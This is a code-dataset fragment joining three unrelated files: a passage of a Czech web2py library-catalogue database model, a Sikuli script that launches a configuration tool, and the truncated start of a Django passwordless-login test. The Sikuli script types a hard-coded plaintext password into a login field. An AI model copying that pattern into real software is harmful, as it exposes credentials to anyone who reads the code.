pokud používáte signatury a každý výtisk má mít unikátní\")),\n Field('st_imp_sgsep', 'string', length=3, notnull=True, default='', # libstyle['sgsep']\n label=T(\"Oddělovač v signatuře\"), comment=T(\"unikátní signatura výtisku (je-li použita): znak(y) pro oddělení dodatku\")),\n Field('st_imp_sgmod1', 'string', length=1, notnull=True, default='', # libstyle['sg'][1]\n label=T(\"Signatura, 1.výtisk\"), comment=T(\"unikátní signatura výtisku (je-li použita): přídavný znak 1.výtisku (např. prázdný, a, A, 1)\")),\n Field('st_imp_sgmod2', 'string', length=1, notnull=True, default='b', # libstyle['sg'][2]\n label=T(\"Signatura, 2.výtisk\"), comment=T(\"unikátní signatura výtisku (je-li použita): přídavný znak 2.výtisku (např. a, b, B, 2)\")),\n Field('st_imp_st', 'boolean', notnull=True, default=False, # libstyle['gr'][1] = s\n label=T(\"Stat.dělení výtisků ?\"), comment=T(\"označte, pokud chcete pro účel statistiky rozdělovat výtisky (tip: i pro oddělení dosp/děts, pokud výtisky titulu mohou být přiděleny do různých oddělení)\")),\n Field('st_tit_st', 'boolean', notnull=True, default=False, # libstyle['gr'][2] = S\n label=T(\"Stat.dělení titulů ?\"), comment=T(\"označte, pokud chcete pro účel statistiky rozdělovat tituly\")),\n Field('imp_total', 'integer', readable=False, default=0,\n label=T(\"Počet v importu\"), comment=T(\"počet publikací, které budou/byly celkově importovány\")),\n Field('imp_proc', 'decimal(5,2)', readable=False, writable=False, default=100.0), # import position in %\n Field('imp_done', 'integer', readable=False, default=0,\n label=T(\"Počet již importovaných\"), comment=T(\"počet již importovaných publikací celkem (nových i existujících)\")), # imp_done cnt\n Field('imp_new', 'integer', readable=False, default=0,\n label=T(\"Počet nových\"), comment=T(\"počet nových již importovaných publikací\")), # imp_new cnt\n Field('last_import', 'datetime', writable=False,\n label=T(\"Naposledy importováno\"), comment=T(\"čas posledního importu z jiného systému\")),\n format='%(library)s'\n )\n\ndb.define_table('auth_lib',\n Field('auth_user_id', db.auth_user,\n readable=True, writable=False,\n requires=IS_IN_DB(db, db.auth_user.id, '%(username)s'),\n ondelete='SET NULL',\n label=T(\"Uživatel\"), comment=T(\"uživatel\")),\n Field('library_id', db.library,\n readable=True, writable=False,\n requires=IS_IN_DB(db, db.library.id, '%(library)s'),\n ondelete='SET NULL',\n label=T(\"Knihovna\"), comment=T(\"přístup uživatele do knihovny\")),\n Field('rw', 'boolean', default=False,\n label=T(\"Pro zápis\"), comment=T(\"jsou povoleny změny dat v knihovně\")),\n common_filter=lambda query: 
db.auth_lib.auth_user_id == auth.user_id,\n format='user %(auth_user_id)s lib %(library_id)s'\n )\n\n# dočasně, dokud ladíme první knihovnu\n# TODO: nahradit mechanismem, kdy pro novou knihovnu bude povoleno, pro starou ověří mailem prvnímu uživateli\nif session.library_id:\n auth.library_id = session.library_id\nelif auth.is_logged_in():\n first_library = db(db.auth_lib.library_id).select().first()\n auth.library_id = first_library and first_library.library_id or None\nelse:\n auth.library_id = None\n\ndb.define_table('lib_rights',\n Field('auth_lib_id', db.auth_lib,\n readable=True, writable=False,\n requires=IS_IN_DB(db, db.auth_lib.id, 'user %(auth_user_id)s lib %(library_id)s'),\n ondelete='CASCADE',\n label=T(\"Přístup k\"), comment=T(\"vazba uživatele na knihovnu\")),\n Field('auth_user_id', db.auth_user,\n readable=True, writable=False,\n requires=IS_EMPTY_OR(IS_IN_DB(db, db.auth_user.id, '%(username)s')),\n ondelete='SET NULL',\n label=T(\"povolil\"), comment=T(\"oprávnění povolil ..\")),\n Field('allowed', 'string', length=1,\n readable=True, writable=False,\n requires=IS_IN_SET((('R', T(\"číst\")), ('W', T(\"zapisovat\")), ('A', T(\"admin\")))),\n label=T(\"Oprávnění\"), comment=T(\"oprávnění uživatele\")),\n Field('given', 'datetime',\n readable=True, writable=False,\n requires=[IS_NOT_EMPTY(), IS_DATETIME(format=T('%d.%m.%Y %H:%M'))],\n label=T(\"Založeno dne\"), comment=T(\"od kdy má oprávnění\")),\n )\n\ndb.define_table('rgroup',\n Field('library_id', db.library,\n default=auth.library_id,\n readable=True, writable=False,\n ondelete='RESTRICT',\n label=T(\"Knihovna\"), comment=T(\"jméno knihovny\")),\n Field('rgroup', 'string', length=48,\n notnull=True, requires=IS_NOT_EMPTY(),\n label=T(\"Skupina\"), comment=T(\"skupina čtenářů (např. pro školní knihovny školní třída\")),\n common_filter=lambda query: db.rgroup.library_id == auth.library_id,\n singular=T(\"skupina čtenářů\"), plural=T(\"skupiny čtenářů\"),\n format='%(rgroup)s'\n )\n\ndb.define_table('reader',\n Field('library_id', db.library,\n default=auth.library_id,\n readable=False, writable=False,\n ondelete='CASCADE',\n label=T(\"Knihovna\"), comment=T(\"jméno knihovny\")),\n Field('lastname', 'string', length=32,\n notnull=True, requires=IS_NOT_EMPTY(),\n label=T(\"Příjmení\"), comment=T(\"příjmení čtenáře\")),\n Field('firstname', 'string', length=32,\n label=T(\"Jméno\"), comment=T(\"křestní jméno čtenáře (a případně jeho/její další jména)\")),\n Field('rgroup_id', db.rgroup,\n requires=IS_EMPTY_OR(IS_IN_DB(db, db.rgroup.id, '%(rgroup)s')), ondelete='SET NULL',\n label=T(\"Skupina\"), comment=T(\"skupina čtenářů\")),\n Field('email', 'string', length=64,\n label=T(\"E-mail\"), comment=T(\"e-mail\")),\n common_filter=lambda query: db.reader.library_id == auth.library_id,\n singular=T(\"čtenář\"), plural=T(\"čtenáři\"),\n format='%(lastname)s %(firstname)s'\n )\n\ndb.define_table('place',\n Field('library_id', db.library,\n default=auth.library_id,\n readable=False, writable=False,\n ondelete='CASCADE',\n label=T(\"Knihovna\"), comment=T(\"jméno knihovny\")),\n Field('place', 'string', length=64,\n notnull=True, requires=IS_NOT_EMPTY(),\n label=T(\"Umístění\"),\n comment=T(\"umístění výtisků (např. 
regál, místnost nebo případně oddělení)\")),\n Field('place_id', 'reference place',\n ondelete='RESTRICT', represent=lambda id, row: id and id.place or '',\n label=T(\"Nadřazené\"), comment=T(\"patří do (širšího) umístění: takto lze vytvořit hierarchickou strukturu (oddělení, místnost, regál)\")),\n common_filter=lambda query: db.place.library_id == auth.library_id,\n singular=T(\"umístění##singular\"), plural=T(\"umístění##plural\"),\n format='%(place)s'\n )\n# TODO: čti on_define (book 6) při přechodu na lazy_tables\ndb.place.place_id.requires = IS_EMPTY_OR(IS_IN_DB(db, db.place.id, '%(place)s'))\n\ndb.define_table('stat_group',\n Field('library_id', db.library,\n default=auth.library_id,\n readable=False, writable=False,\n ondelete='CASCADE',\n label=T(\"Knihovna\"), comment=T(\"jméno knihovny\")),\n Field('tbl', 'string', length=1, default='I',\n notnull=True, requires=IS_IN_SET((('I', T(\"výtisky (exempláře)\")), ('T', T(\"publikace (tituly)\")),\n ('R', T(\"čtenáři\")))), #, ('B', T(\"výpůjčky\"))\n label=T(\"Účel\"), comment=T(\"ve kterém seznamu umožnit výběr této statistiky\")),\n Field('stat_group', 'string', length=48,\n notnull=True, requires=IS_NOT_EMPTY(),\n label=T(\"Kategorie\"), comment=T(\"statistická skupina, která se bude vyhodnocovat\")),\n common_filter=lambda query: (db.stat_group.library_id == auth.library_id) & (db.stat_group.tbl == 'I'),\n singular=T(\"statistická skupina\"), plural=T(\"statistická skupiny\"),\n format='%(stat_group)s'\n )\n\ndb.define_table('question',\n Field('auth_user_id', db.auth_user, default=auth.user_id,\n readable=False, writable=False,\n ondelete='CASCADE',\n label=T(\"Uživatel\"), comment=T(\"zadavatel dotazu\")),\n Field('question', 'string', length=PublLengths.question,\n requires=IS_LENGTH(minsize=PublLengths.question_min, maxsize=PublLengths.question,\n error_message=T(\"zadej %s až %s znaků\") % (PublLengths.question_min, PublLengths.question)),\n #UNIQUE_QUESTION()],\n label=T(\"Dotaz\")), # comment is dynamic in controller\n Field('asked', 'datetime',\n readable=False, writable=False,\n label=T(\"Zadáno\"), comment=T(\"čas zadání dotazu\")),\n Field('duration_z39', 'integer',\n readable=False, writable=False,\n label=T(\"Trvání stažení\"), comment=T(\"doba do dokončení stažení dat [s]\")),\n Field('duration_marc', 'integer',\n readable=False, writable=False,\n label=T(\"Trvání získání dat\"), comment=T(\"doba do uložení nalezených knih [s]\")),\n Field('duration_total', 'integer',\n readable=False, writable=False,\n label=T(\"Trvání celkem\"), comment=T(\"doba do vytvoření indexů [s]\")),\n Field('known', 'integer',\n readable=False, writable=False,\n label=T(\"Již známo\"), comment=T(\"počet lokálně známých publikací\")),\n Field('we_have', 'integer',\n readable=False, writable=False,\n label=T(\"Vlastněno\"), comment=T(\"počet vyhovujících publikací v knihovně uživatele\")),\n Field('retrieved', 'integer',\n readable=False, writable=False,\n label=T(\"Celkem získáno\"), comment=T(\"počet nalezených publikací\")),\n Field('inserted', 'integer',\n readable=False, writable=False,\n label=T(\"Nově získáno\"), comment=T(\"nových (dosud nestažených)\")),\n Field('live', 'boolean', default=True,\n readable=False, writable=False,\n label=T(\"Nezpracováno\"), comment=T(\"čeká se na odpověď nebo její použití (katalogizaci)\")),\n )\n\ndb.define_table('extsrc',\n Field('name', 'string',\n label=T(\"Pojmenování zdroje\"), comment=T(\"označení externího zdroje\")),\n Field('cls_read', 'string', length=64,\n label=T(\"Třída pro stažení\"), 
comment=T(\"jméno třídy pro stažení externího zdroje\")),\n Field('mod_read', 'string', length=64,\n label=T(\"Modul pro stažení\"), comment=T(\"modul třídy pro stažení externího zdroje\")),\n Field('cls_parse', 'string', length=64,\n label=T(\"Třída pro zpracování\"), comment=T(\"jméno třídy pro zpracování externího zdroje\")),\n Field('mod_parse', 'string', length=64,\n label=T(\"Modul pro zpracování\"), comment=T(\"modul třídy pro zpracování externího zdroje\")),\n Field('z39_server', 'string', length=64,\n label=T(\"z39 server\"), comment=T(\"url z39 serveru\")),\n Field('z39_port', 'string', length=8,\n label=T(\"z39 port\"), comment=T(\"port z39 serveru\")),\n Field('z39_database', 'string', length=64,\n label=T(\"z39 databáze\"), comment=T(\"databáze z39 serveru\")),\n Field('src_quality', 'integer', default=70, writable=False,\n label=T(\"Kvalita zdroje\"), comment=T(\"kvalita zdroje [%]\")),\n )\n\ndb.define_table('answer',\n Field('marc_id', 'integer', # type integer and default=1(Aleph/cz) as long we do not support more marc dialects\n default=1, label=T(\"MARC dialekt\"), comment=T(\"dialekt MARC jazyka\")), # TODO: obsolete? replaced by extsrc?\n Field('extsrc_id', db.extsrc,\n label=T(\"Externí zdroj\"), comment=T(\"externí zdroj (a formát) pro .marc\")),\n Field('md5publ', 'string', length=32,\n label=T(\"md5publ\"), comment=T(\"md5publ\")),\n Field('md5marc', 'string', length=32,\n label=T(\"md5marc\"), comment=T(\"md5marc\")),\n Field('z39stamp', 'datetime', writable=False,\n label=T(\"Čas dotazu\"), comment=T(\"čas dotazu na z39 službu\")),\n Field('ean', 'string', length=20,\n label=T(\"Čarový kód EAN\"), comment=T(\"čarový kód, vytištěný na publikaci nebo odpovídající ISBN\")),\n Field('ean_hidden', 'boolean', default=False,\n label=T(\"EAN neuveden\"), comment=T(\"EAN je odvozen z ISBN a není uveden na knize\")),\n Field('rik', 'string', length=PublLengths.rik,\n readable=False, writable=False,\n label=T(\"Rychlá identifikace\"), comment=T(\"rychlá identifikace knihy podle EAN (obrácené pořadí)\")),\n Field('country', 'string', length=PublLengths.country,\n label=T(\"Země vydání\"), comment=T(\"země vydání\")),\n Field('year_from', 'integer',\n label=T(\"Vydání od\"), comment=T(\"vydání od roku\")),\n Field('year_to', 'integer',\n label=T(\"Vydání do\"), comment=T(\"vydání do roku\")),\n Field('fastinfo', 'text',\n label=T(\"Hlavní údaje\"), comment=T(\"hlavní údaje\")),\n Field('src_quality', 'integer', default=30, writable=False,\n label=T(\"Kvalita zdroje\"), comment=T(\"kvalita zdroje [%]\")),\n Field('needindex', 'boolean', default=True, readable=False, writable=False),\n Field('marc', 'text',\n label=T(\"marc\"), comment=T(\"marc\")),\n )\n\ndb.define_table('rik2',\n Field('answer_id', db.answer, ondelete='CASCADE',\n label=T(\"Publikace\"), comment=T(\"publikace\")),\n Field('rik2', 'string', length=PublLengths.rik,\n readable=False, writable=False,\n label=T(\"Náhradní RIK\"), comment=T(\"náhradní rychlá identifikace knihy při později nalezeném EANu (obrácené pořadí)\")),\n )\n\ndb.define_table('authority',\n Field('name', 'string', length=96,\n label=T(\"Jméno\"), comment=T(\"příjmení (bez tagu) a jméno (s tagy podpole) autority\")),\n Field('atype', 'string', length=1, default=\"P\",\n requires=IS_EMPTY_OR(IS_IN_SET((('P', T(\"osoba\")), ('O', T(\"organizace, instituce\")), ('E', T(\"událost, akce\"))))),\n label=T(\"Typ autora\"), comment=T(\"P\")),\n Field('asex', 'string', length=1,\n requires=IS_EMPTY_OR(IS_IN_SET((('M', T(\"muž\")), ('W', 
T(\"žena\"))))),\n label=T(\"Pohlaví\"), comment=T(\"pohlaví autora (fyzické osoby)\")),\n Field('year1', 'integer',\n label=T(\"Narozen\"), comment=T(\"rok narození (nebo začátek existence) pro vyhledávání\")),\n Field('year2', 'integer',\n label=T(\"Zemřel\"), comment=T(\"rok úmrtí (nebo začátek existence) pro vyhledávání\")),\n Field('years', 'text',\n label=T(\"Roky\"), comment=T(\"život (nebo existence) v letech (uvést, pokud roky nejsou známy přesně)\")),\n Field('description', 'text',\n label=T(\"Další\"), comment=T(\"další informace\")),\n )\n\ndb.define_table('book_authority',\n Field('answer_id', db.answer, ondelete='CASCADE',\n label=T(\"Publikace\"), comment=T(\"publikace\")),\n Field('authority_id', db.authority,\n label=T(\"Autorita\"), comment=T(\"autorita\")),\n Field('role', 'string', length=PublLengths.irole,\n requires=IS_EMPTY_OR(IS_IN_SET((('aut', T(\"autor\")), ('ilu', T(\"ilustrátor\")),\n ('fot', T(\"fotograf\")), ('prk', T(\"překladatel\"))))),\n label=T(\"Role\"), comment=T(\"role\")),\n )\n\ndb.define_table('publisher',\n Field('name', 'string', length=128,\n label=T(\"Jméno\"), comment=T(\"Jméno nakladatele\")),\n Field('plocation', 'string', length=64,\n label=T(\"Sídlo\"), comment=T(\"Místo vydání\")),\n Field('country', 'string', length=PublLengths.country,\n label=T(\"Země vydání\"), comment=T(\"země vydání\")),\n Field('year1', 'integer',\n label=T(\"Začátek\"), comment=T(\"začátek působení\")),\n Field('year2', 'integer',\n label=T(\"Konec\"), comment=T(\"konec působení\")),\n )\n\ndb.define_table('book_publisher',\n Field('answer_id', db.answer, ondelete='CASCADE',\n label=T(\"Publikace\"), comment=T(\"publikace\")),\n Field('publisher_id', db.publisher,\n label=T(\"Nakladatel\"), comment=T(\"nakladatel\")),\n )\n\ndb.define_table('idx_long',\n Field('category', 'string', length=1,\n label=T(\"Kategorie\"), comment=T(\"kategorie (typ) vyhledávacího údaje\")),\n Field('item', 'string', length=PublLengths.ilong,\n label=T(\"Vyhledávací údaj\"), comment=T(\"údaj publikace (dlouhý)\")),\n )\n\ndb.define_table('idx_join',\n Field('answer_id', db.answer,\n ondelete='CASCADE',\n label=T(\"Odpověď\"), comment=T(\"příslušnost k odpovědi\")),\n Field('idx_long_id', db.idx_long,\n ondelete='CASCADE',\n label=T(\"Vyhledávací řetězec\"), comment=T(\"příslušnost k vyhledávacímu řetězci\")),\n Field('role', 'string', length=PublLengths.irole,\n label=T(\"Role\"), comment=T(\"role, pořadí v sérii, apod.\")),\n )\n\ndb.define_table('idx_short',\n Field('answer_id', db.answer,\n ondelete='CASCADE',\n label=T(\"Publikace\"), comment=T(\"příslušnost k publikaci\")),\n Field('category', 'string', length=1,\n label=T(\"Kategorie\"), comment=T(\"kategorie (typ) vyhledávacího údaje\")),\n Field('item', 'string', length=PublLengths.ishort,\n label=T(\"Vyhledávací údaj\"), comment=T(\"údaj publikace (krátký)\")),\n )\n\ndb.define_table('idx_word',\n Field('answer_id', db.answer,\n ondelete='CASCADE',\n label=T(\"Publikace\"), comment=T(\"příslušnost k publikaci\")),\n Field('word', 'string', length=PublLengths.iword,\n label=T(\"Vyhledávací údaj\"), comment=T(\"údaj publikace (krátký)\")),\n )\n\ndb.define_table('lib_descr',\n Field('answer_id', db.answer,\n notnull=True, ondelete='RESTRICT',\n label=T(\"Odpověď\"), comment=T(\"příslušnost k odpovědi\")),\n Field('descr', 'text',\n label=T(\"Anotace\"), comment=T(\"anotace (v interpretaci knihovny)\")),\n )\n\nFOUND_AL_LBL = T(\"nalezen naposledy\")\nFOUND_AL_CMT = T(\"zda byl součástí minulého (neinkrementálního) 
importu\")\ndb.define_table('owned_book',\n Field('library_id', db.library,\n default=auth.library_id,\n readable=False, writable=False,\n notnull=True, ondelete='RESTRICT',\n label=T(\"Knihovna\"), comment=T(\"jméno knihovny\")),\n Field('answer_id', db.answer,\n notnull=True, ondelete='RESTRICT',\n label=T(\"Odpověď\"), comment=T(\"příslušnost k odpovědi\")),\n Field('lib_descr_id', db.lib_descr,\n ondelete='RESTRICT',\n label=T(\"Popis\"), comment=T(\"bibliografický popis, pozměněný pro potřeby knihovny\")),\n Field('fastinfo', 'text',\n label=T(\"Hlavní údaje\"), comment=T(\"hlavní údaje (v interpretaci knihovny)\")),\n Field('cnt', 'integer',\n default=0,\n label=T(\"Výtisků\"), comment=T(\"počet výtisků v knihovně\")),\n Field('found_at_last', 'boolean', notnull=True, default=True,\n label=FOUND_AL_LBL, comment=FOUND_AL_CMT),\n common_filter=lambda query: (db.owned_book.library_id == auth.library_id) & (db.owned_book.cnt > 0),\n )\n\ndb.define_table('partner',\n Field('library_id', db.library,\n default=auth.library_id,\n readable=False, writable=False,\n notnull=True, ondelete='RESTRICT',\n label=T(\"Knihovna\"), comment=T(\"jméno knihovny\")),\n Field('name', 'string', length=48,\n notnull=True, requires=IS_NOT_EMPTY(),\n label=T(\"Název\"), comment=T(\"název nebo jméno obchodního partnera\")),\n Field('state_reg', 'string', length=16,\n label=T(\"IČO\"), comment=T(\"IČO/rč (státní identifikátor organizace nebo osoby)\")),\n Field('vat_reg', 'string', length=18,\n label=T(\"DIČ\"), comment=T(\"DIČ (daňový identifikátor organizace nebo osoby)\")),\n Field('street', 'string', length=48,\n label=T(\"Ulice\"), comment=T(\"adresa: ulice a č.domu\")),\n Field('place', 'string', length=48,\n label=T(\"Místo\"), comment=T(\"adresa: místo (město, obec)\")),\n Field('plz', 'string', length=8,\n label=T(\"PSČ\"), comment=T(\"poštovní směrovací číslo\")),\n Field('email', 'string', length=64,\n label=T(\"EMail\"), comment=T(\"hlavní emailová adresa\")),\n Field('link', 'string', length=92,\n label=T(\"Odkaz\"), comment=T(\"URL adresa (webové stránky, www)\")),\n Field('contact', 'text',\n label=T(\"Kontakt\"), comment=T(\"kontaktní osoba, telefony, další e-mailové adresy, apod.\")),\n common_filter=lambda query: db.partner.library_id == auth.library_id,\n format=lambda row: ', '.join((row.name, row.place))\n )\n\nbill_format = lambda row: ', '.join(filter(lambda item: item, (row['no_our'], row['htime'].strftime(dtformat)))) if row else ''\n # dict format row['..'] instead of Storage format must be used, because this is used for dict formatting too\ndb.define_table('bill',\n Field('library_id', db.library,\n default=auth.library_id,\n readable=False, writable=False,\n notnull=True, ondelete='RESTRICT',\n label=T(\"Knihovna\"), comment=T(\"jméno knihovny\")),\n Field('partner_id', db.partner,\n notnull=True, ondelete='RESTRICT',\n label=T(\"Partner\"), comment=T(\"obchodní partner (např. 
dodavatel)\")),\n Field('take_in', 'boolean', notnull=True, default=True,\n label=T(\"Příjem\"), comment=T(\"nákup, získaný dar nebo přijatá MVS/zápůjčka (naskladňuji knihy)\")),\n Field('gift', 'boolean', notnull=True, default=False,\n label=T(\"Dar\"), comment=T(\"knihy trvale získané (nebo poskytnuté) darem\")),\n Field('loan', 'string', length=2,\n requires=IS_EMPTY_OR(IS_IN_SET(HACTIONS_MVS_HINT)),\n label=T(\"Zápůjčka\"), comment=T(\"(dočasná) meziknihovní výměna (MVS) nebo zápůjčka)\")),\n Field('no_our', 'string', length=16,\n label=T(\"Naše číslo\"), comment=T(\"naše číslo dokladu (nepovinné)\")),\n Field('no_partner', 'string', length=18,\n label=T(\"Jejich číslo\"), comment=T(\"číslo dokladu dodavatele nebo odběratele (nepovinné)\")),\n Field('htime', 'datetime', default=datetime.datetime.utcnow(),\n notnull=True,\n label=T(\"Čas\"), comment=T(\"čas nákupu (převodu, apod.); i když doklad obsahuje jen datum, je dobré zadat i přibližný čas, který se zapíše v historii výtisků\")),\n Field('cnt_imp', 'integer', notnull=True, default=0, writable=False,\n label=T(\"Výtisků\"), comment=T(\"počet výtisků, zadaných při zápisu dokladu\")),\n Field('btotal', 'decimal(12,2)',\n notnull=True,\n label=T(\"Částka\"), comment=T(\"celková částka na dokladu\")),\n Field('bcurrency', 'string', length=3, default=DEFAULT_CURRENCY,\n notnull=True, requires=IS_IN_SET(SUPPORTED_CURRENCIES),\n label=T(\"Měna\"), comment=T(\"měna\")),\n Field('imp_added', 'datetime', writable=False,\n label=T(\"Zpracován\"), comment=T(\"kdy byly zaznamenány všechny položky dokladu\")),\n common_filter=lambda query: db.bill.library_id == auth.library_id,\n format=bill_format\n )\n\ndb.define_table('impression',\n Field('library_id', db.library,\n default=auth.library_id,\n readable=False, writable=False,\n notnull=True, ondelete='RESTRICT',\n label=T(\"Knihovna\"), comment=T(\"jméno knihovny\")),\n Field('answer_id', db.answer,\n notnull=True, ondelete='RESTRICT',\n readable=False, writable=False,\n label=T(\"Odpověď\"), comment=T(\"příslušnost k odpovědi\")),\n Field('owned_book_id', db.owned_book,\n notnull=True, ondelete='RESTRICT',\n readable=False, writable=False,\n label=T(\"Publikace (vlastní)\"), comment=T(\"publikace - záznam, specifický pro tuto knihovnu\")),\n Field('place_id', db.place,\n requires=IS_EMPTY_OR(IS_IN_DB(db, db.place.id, '%(place)s')), ondelete='SET NULL',\n label=T(\"Umístění\"), comment=T(\"umístění výtisku\")),\n Field('live', 'boolean', default=True,\n readable=False, writable=False,\n label=T(\"Platný výtisk\"), comment=T(\"platný (nevyřazený) výtisk\")),\n Field('gift', 'boolean', notnull=True, default=False,\n label=T(\"Dar\"), comment=T(\"získáno darem\")),\n Field('loan', 'boolean', default=False,\n readable=False, writable=False,\n label=T(\"Dočasná zápůjčka\"), comment=T(\"meziknihovní vým��na (MVS) nebo zápůjčka\")),\n Field('iorder', 'integer',\n notnull=True, writable=False,\n label=T(\"Pořadové číslo\"), comment=T(\"pořadové číslo výtisku\")),\n Field('iid', 'string', length=PublLengths.iid,\n label=T(\"Přírůstkové číslo\"), comment=T(\"přírůstkové číslo\")),\n Field('sgn', 'string', length=PublLengths.sgn,\n label=T(\"Signatura\"), comment=T(\"signatura výtisku\")),\n Field('barcode', 'string', length=PublLengths.barcode,\n label=T(\"Čarový kód\"), comment=T(\"čarový kód výtisku\")),\n Field('registered', 'date', default=datetime.date.today(),\n notnull=True, writable=False,\n label=T(\"Evidován\"), comment=T(\"datum zápisu do počítačové evidence\")),\n Field('price_in', 
'decimal(12,2)',\n label=T(\"Nákupní cena\"),\n comment=T(\"nákupní nebo pořizovací cena výtisku (přepočtená na %s)\") % (DEFAULT_CURRENCY)),\n Field('icondition', 'text',\n label=T(\"Stav\"), comment=T(\"stav výtisku, poškození\")),\n Field('htime', 'datetime', default=datetime.datetime.utcnow(),\n notnull=True, writable=False,\n label=T(\"Poslední manipulace\"), comment=T(\"čas poslední manipulace (v UTC)\")),\n Field('haction', 'string', length=2, default='+o',\n notnull=True, requires=IS_IN_SET(HACTIONS), writable=False,\n label=T(\"Poslední akce\"), comment=T(\"naposledy provedená činnost s výtiskem\")),\n Field('found_at_last', 'boolean', notnull=True, default=True,\n label=FOUND_AL_LBL, comment=FOUND_AL_CMT),\n common_filter=lambda query: (db.impression.library_id == auth.library_id) & (db.impression.live == True),\n format=T('čís.') + ' %(iorder)s'\n ) # htime, haction: redundant info for easier and faster access to the last impr_hist entry\n\ndb.define_table('impr_hist',\n Field('impression_id', db.impression,\n writable=False,\n notnull=True, ondelete='CASCADE',\n label=T(\"Výtisk\"), comment=T(\"výtisk publikace\")),\n Field('auth_user_id', db.auth_user, default=auth.user_id,\n writable=False,\n notnull=True, ondelete='SET NULL',\n label=T(\"Provedl\"), comment=T(\"uživatel, který provedl akci\")),\n Field('reader_id', db.reader,\n writable=False,\n ondelete='SET NULL',\n label=T(\"Čtenář\"), comment=T(\"čtenář\")),\n Field('bill_id', db.bill,\n writable=False,\n ondelete='RESTRICT',\n label=T(\"Doklad\"), comment=T(\"doklad (např. účtenka, faktura, soupiska zápůjčky)\")),\n Field('htime', 'datetime', default=datetime.datetime.utcnow(),\n notnull=True, writable=False,\n label=T(\"Čas\"), comment=T(\"čas akce (v UTC)\")),\n Field('haction', 'string', length=2, default='+o',\n notnull=True, requires=IS_IN_SET(HACTIONS), writable=False,\n label=T(\"Akce\"), comment=T(\"provedená činnost\")),\n )\n\ndb.define_table('import_run',\n Field('library_id', db.library,\n default=auth.library_id,\n readable=False, writable=False,\n notnull=True, ondelete='RESTRICT',\n label=T(\"Knihovna\"), comment=T(\"jméno knihovny\")),\n Field('scheduler_task_id', 'integer',\n readable=False, writable=False),\n Field('incremental', 'boolean', notnull=True, default=False,\n label=T(\"inkrementální\"), comment=T(\"pouze inkrementální import\")),\n Field('started', 'datetime', default=datetime.datetime.utcnow(),\n notnull=True, writable=False,\n label=T(\"Čas začátku\"), comment=T(\"čas zahájení importu\")),\n Field('finished', 'datetime', writable=False,\n label=T(\"Čas ukončení\"), comment=T(\"čas ukončení importu\")),\n Field('cnt_total', 'integer', writable=False,\n label=T(\"Publikací\"), comment=T(\"celkem zpracováno publikací\")),\n Field('cnt_new', 'integer', writable=False,\n label=T(\"Z toho nových\"), comment=T(\"z toho bylo nově přidáno publikací\")),\n Field('failed', 'boolean', default=False, writable=False,\n label=T(\"Nedokončeno\"), comment=T(\"import nebyl řádně dokončen\")),\n common_filter=lambda query: db.import_run.library_id == auth.library_id,\n )\n\ndb.define_table('import_redirect',\n Field('md5publ_computed', 'string', length=32,\n label=T(\"md5publ_computed\"), comment=T(\"md5publ_computed\")),\n Field('md5publ_final', 'string', length=32,\n label=T(\"md5publ_final\"), comment=T(\"md5publ_final\")),\n )\n\n'''\ndb.define_table('import_book',\n Field('library_id', db.library,\n default=auth.library_id,\n readable=False, writable=False,\n notnull=True, ondelete='RESTRICT',\n 
label=T(\"Knihovna\"), comment=T(\"jméno knihovny\")),\n Field('md5imp', 'string', length=32,\n label=T(\"md5imp\"), comment=T(\"md5imp\")),\n Field('found_at_last', 'boolean', notnull=True, default=True,\n label=FOUND_AL_LBL, comment=FOUND_AL_CMT),\n common_filter=lambda query: db.import_book.library_id == auth.library_id,\n )\n'''\n\ndef book_cnt_insert(flds, id):\n db((db.owned_book.id == flds['owned_book_id']) & (db.owned_book.library_id == auth.library_id),\n ignore_common_filters=True).update(cnt=db.owned_book.cnt + 1) # without filter as long it contain cnt>0\ndef book_cnt_update(w2set, flds):\n if 'live' in flds:\n impressions = w2set.select(db.impression.owned_book_id, db.impression.live)\n for impression in impressions:\n if impression.live is True and flds['live'] is False:\n db(db.owned_book.id == impression.owned_book_id).update(cnt=max(0, db.owned_book.cnt - 1))\n elif impression.live is False and flds['live'] is True:\n db(db.owned_book.id == impression.owned_book_id).update(cnt=db.owned_book.cnt + 1)\ndef book_cnt_delete(w2set):\n impressions = w2set.select(db.impression.owned_book_id, orderby=db.impression.owned_book_id)\n for key, group in groupby(impressions, lambda impression: impression.owned_book_id):\n db(db.owned_book.id == key).update(cnt=max(0, db.owned_book.cnt - len([bk for bk in group])))\ndb.impression._after_insert.append(book_cnt_insert)\ndb.impression._before_update.append(book_cnt_update)\ndb.impression._before_delete.append(book_cnt_delete)\n","repo_name":"zvolsky/codex2020","sub_path":"models/db_model.py","file_name":"db_model.py","file_ext":"py","file_size_in_byte":40714,"program_lang":"python","lang":"cs","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"32433208129","text":"#oem 별 client focusing 및 ConfTool 실행\n\ndef focus_app(appName):\n global g2conftool\n g2conftool = App(appName)\n g2conftool.focus()\n\ndef openApp_logIn(path,image):\n check=str(g2conftool)\n if check[1]=='-':\n App.open(path)\n while not exists(image):\n wait(1)\n type(image,\"12345678\"+Key.ENTER) \n\n\n\noem=open(\"c:/sikuli/TestResult.txt\").read(1)\nif oem == \"I\":\n focus_app(\"G2ConfTool.exe\")\n openApp_logIn(\"C:\\IDIS Solution Suite\\Client\\G2ConfTool.exe\",Pattern(\"1486530419073.png\").similar(0.92))\n\nelse:\n focus_app(\"G2ConfTool.exe\")\n openApp_logIn(\"C:\\iNEX\\Client\\G2ConfTool.exe\",Pattern(\"1486530419073.png\").similar(0.92))\n","repo_name":"OldFeelLee/sikuliProject","sub_path":"legacy/AutoInstall/OEM_Conf.sikuli/OEM_Conf.py","file_name":"OEM_Conf.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"31862247711","text":"from django.test import TestCase \nfrom django.contrib.auth import get_user_model\nfrom accounts.authentication import PasswordlessAuthenticationBackend as pwdlessBackend\nfrom accounts.models import Token\n\nUser = get_user_model()\n\n\n\nclass AuthenticateTest(TestCase):\n def test_returns_None_if_no_token(self):\n the_user = pwdlessBackend().authenticate(\"no-such-token\")\n self.assertIsNone(the_user)\n \n def test_returns_new_user_from_email_if_token(self):\n an_email = \"test_user@example.com\"\n token = Token.objects.create(email=an_email)\n new_user = pwdlessBackend().authenticate(token.uid)\n the_user = User.objects.get(email=an_email)\n self.assertEqual(the_user, new_user)\n\n def test_returns_existing_user_from_email_if_token(self):\n an_email = \"test_user@example.com\"\n existing_user = 
